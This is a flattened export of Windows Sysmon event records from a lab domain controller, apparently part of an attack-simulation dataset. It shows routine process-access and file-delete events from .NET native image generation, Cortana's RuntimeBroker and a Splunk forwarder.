21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022392Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022391Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022390Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022389Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.118{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022388Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.118{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:51.936{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1605-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1605-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:51.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1605-00000000CF01}2408C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.890{4DB9351A-A26B-60D3-1505-00000000CF01}4904NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\93MD4N43UG\Microsoft.VisualBasic.ni.dll.auxMD5=9DE7C1ACE8645912560166BC2D7B7920,SHA256=82A8B083657234F4620D1C3D04A8C52C096E5B28A0A83955495EF106A9C2AEF8,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.890{4DB9351A-A26B-60D3-1505-00000000CF01}4904NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\93MD4N43UG\Microsoft.VisualBasic.ni.dllMD5=84B53D687A439A0883C25E7603AFC1D3,SHA256=350FBD904B2703B0843684A2D157459DEF0F0F2315CB395D1303965F2CC9B5CC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.749{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1505-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.721{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1505-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:51.721{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1505-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.721{4DB9351A-A26B-60D3-1405-00000000CF01}512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NE0IE2N4YC\Accessibility.ni.dll.auxMD5=084445535601300C3CBA320815E1F945,SHA256=89F9FE654030D2A90B6DA6F253A1E394BBD1FEB84DD760B56AB12BB781F97325,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.721{4DB9351A-A26B-60D3-1405-00000000CF01}512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NE0IE2N4YC\Accessibility.ni.dllMD5=15D4B1639EFC41ADC6FCE822A6B17557,SHA256=D463452A95FD5881FDA19FA812DB00DB1DF6FB7844F93FF75E12AE1718B8396E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.686{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1405-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.671{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1405-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:51.671{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1405-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.671{4DB9351A-A26B-60D3-1305-00000000CF01}6920NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\31WSY5D7S2\System.Management.ni.dll.auxMD5=EDC2DFADA8B50C834AF7E8CCDF2E019A,SHA256=237E1EB1F2296CEA681784D2898E58D02FE826CDE0BAA6A5F32B9608BDF707D9,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.671{4DB9351A-A26B-60D3-1305-00000000CF01}6920NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\31WSY5D7S2\System.Management.ni.dllMD5=32A6B52926FA527DD4F61BA7F6F2E45A,SHA256=66C28B044A5753F6D78CF8A1BCAF026EF9E5BCE605380117FEE17D3BD3CD0750,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.593{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=693D4354D8424189ACAF5EA78F949537,SHA256=F6437775CAD21B2B343F1B525EFBD4728268900E72883443ADC858D966B9EA36,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.530{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1305-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.499{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1305-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.499{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1305-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.483{4DB9351A-A26B-60D3-1205-00000000CF01}3332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VUECGYFUE\System.ServiceProcess.ni.dll.auxMD5=D4AE2E57B736A6E69B3AD3331661A700,SHA256=D7076448A737664A250EA9ADCF9866EDCB84C427426EA5B5F10152D9D412CEE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.483{4DB9351A-A26B-60D3-1205-00000000CF01}3332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VUECGYFUE\System.ServiceProcess.ni.dllMD5=1E765A3E29AC66C0B8A47DC930FD5574,SHA256=90D5D1B4D026521288075AD7DC938C37E27877D1DAEF1B789E000D1F6664625C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 